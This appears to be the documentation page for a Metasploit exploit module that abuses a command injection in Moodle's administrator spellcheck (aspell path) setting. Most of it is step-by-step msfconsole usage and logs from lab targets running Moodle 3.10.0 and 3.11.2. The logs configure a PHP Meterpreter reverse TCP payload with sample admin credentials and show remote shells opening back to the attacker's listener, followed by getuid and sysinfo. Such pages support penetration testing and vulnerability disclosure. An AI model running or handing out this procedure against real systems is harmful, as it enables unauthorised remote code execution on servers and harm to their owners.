h00die
4.1 KiB
4.1 KiB
Vulnerable Application
Moodle allows an authenticated administrator to define spellcheck settings via the web interface. An administrator can update the aspell path to include a command injection. This is extremely similar to CVE-2013-3630, just using a different variable.
This module was tested against Moodle version 3.11.2, 3.10.0, and 3.8.0. Based on the
Talos advisory: 2021-04-21 - Vendor updated documentation to suggest best practices after installation,
it is unclear if Moodle will patch this. Therefore it is unclear what the upper bounds
is on exploitation.
Install
Moodle provides a step by step guide to install their software here
Verification Steps
- Install the application
- Start msfconsole
- Do:
use exploits/multi/http/moodle_spelling_path_rce - Do:
set username [username] - Do:
set password [password] - Do:
run - You should get a shell.
Options
Password
Password of an administrator.
Username
Username of an administrator. Defaults to admin
Scenarios
Moodle 3.10.0 on Ubuntu 20.04
[*] Processing moodle_spellcheck.rb for ERB directives.
resource (moodle_spellcheck.rb)> use exploits/multi/http/moodle_spelling_path_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
resource (moodle_spellcheck.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_spellcheck.rb)> set username admin
username => admin
resource (moodle_spellcheck.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_spellcheck.rb)> set targeturi /moodle-3.10.0/
targeturi => /moodle-3.10.0/
resource (moodle_spellcheck.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_spellcheck.rb)> set proxies http:127.0.0.1:8080
proxies => http:127.0.0.1:8080
resource (moodle_spellcheck.rb)> set ReverseAllowProxy true
ReverseAllowProxy => true
resource (moodle_spellcheck.rb)> set lhost eth0
lhost => eth0
resource (moodle_spellcheck.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.10 detected
[*] Authenticating as user: admin
[*] Updating aspell path
[*] Changing spell engine to PSpellShell
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56124) at 2021-08-29 10:03:37 -0400
[*] Sleeping 5 seconds before cleanup
[*] Authenticating as user: admin
[*] Removing RCE from settings
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer : moodle
OS : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux
Moodle 3.11.2 on Ubuntu 20.04
resource (moodle_spellcheck.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_spellcheck.rb)> set username admin
username => admin
resource (moodle_spellcheck.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_spellcheck.rb)> set targeturi /moodle-3.11.2/
targeturi => /moodle-3.11.2/
resource (moodle_spellcheck.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_spellcheck.rb)> set lhost eth0
lhost => eth0
resource (moodle_spellcheck.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.11.2 detected
[*] Authenticating as user: admin
[*] Updating aspell path
[*] Changing spell engine to PSpellShell
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56130) at 2021-08-29 10:22:03 -0400
[*] Sleeping 5 seconds before cleanup
[*] Authenticating as user: admin
[*] Removing RCE from settings
meterpreter > sysinfo
Computer : moodle
OS : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)